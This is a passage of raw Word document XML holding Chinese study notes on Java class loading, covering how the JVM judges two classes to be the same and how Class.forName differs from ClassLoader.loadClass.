        <w:t>已经在启动时就被引导类加载器（</w:t>
      </w:r>
      <w:r w:rsidR="006A2473">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bootstr</w:t>
      </w:r>
      <w:r w:rsidR="006A2473">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="002D1A62" w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>p ClassL</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ader</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）加载，所以用户自定义的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>永远也无法加载一个自己写的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，除非你改变</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>搜索类的默认算法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E45F0" w:rsidRDefault="003E45F0" w:rsidP="003E45F0">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="00F27C8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="009E14B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何判定类是否相同</w:t>
      </w:r>
      <w:r w:rsidR="009E14B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B46DE5" w:rsidRPr="0001792B" w:rsidRDefault="0001792B" w:rsidP="0001792B">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008E65B5" w:rsidRPr="0001792B">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="008E65B5" w:rsidRPr="0001792B">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>在判定两个</w:t>
      </w:r>
      <w:r w:rsidR="008E65B5" w:rsidRPr="0001792B">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidR="008E65B5" w:rsidRPr="0001792B">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>是否相同时，不仅要判断两个类名是否相同，而且要判断是否由同一个类加载器实例加载的。只有两者同时满足的情况下，</w:t>
      </w:r>
      <w:r w:rsidR="008E65B5" w:rsidRPr="0001792B">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="008E65B5" w:rsidRPr="0001792B">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>才认为这两个</w:t>
      </w:r>
      <w:r w:rsidR="008E65B5" w:rsidRPr="0001792B">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidR="008E65B5" w:rsidRPr="0001792B">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>是相同的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593CC4" w:rsidRPr="0001792B" w:rsidRDefault="00593CC4" w:rsidP="00067787">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00593CC4" w:rsidRDefault="00593CC4" w:rsidP="00067787">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00593CC4" w:rsidRDefault="00DA54D7" w:rsidP="00067787">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId106" w:history="1">
        <w:r w:rsidR="006B0CAF" w:rsidRPr="00FE10DD">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>http://www.codeceo.com/article/java-classloader.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006B0CAF" w:rsidRDefault="006B0CAF" w:rsidP="006B0CAF">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="00F27C8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="006B0CAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Class.forName</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0CAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0CAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ClassLoader.loadClass</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0CAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B0CAF" w:rsidRDefault="006B0CAF" w:rsidP="006B0CAF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0CAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Class.forName</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0CAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0CAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ClassLoader.loadClass</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0CAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD2785" w:rsidRDefault="00DA54D7" w:rsidP="006B0CAF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:hyperlink r:id="rId107" w:history="1">
        <w:r w:rsidR="00354335" w:rsidRPr="00FE10DD">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://blog.sina.com.cn/s/blog_56d8ea90010127ks.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C26429" w:rsidRPr="00C76188" w:rsidRDefault="002B5651" w:rsidP="00C76188">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的装载分了三个阶段，</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>linking</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>initializing</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，分别定义在</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The Java Language Specification</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00600FF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Class.forName(className) </w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实际上是调用</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class.forName(className, true, this.getClass().getClassLoader())</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。注意第二个参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是指</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00113CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>后是不是必须被初始化</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00600FF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader.loadClass(className)</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实际上调用的是</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader.loadClass(name, false)</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，第二个参数指出</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
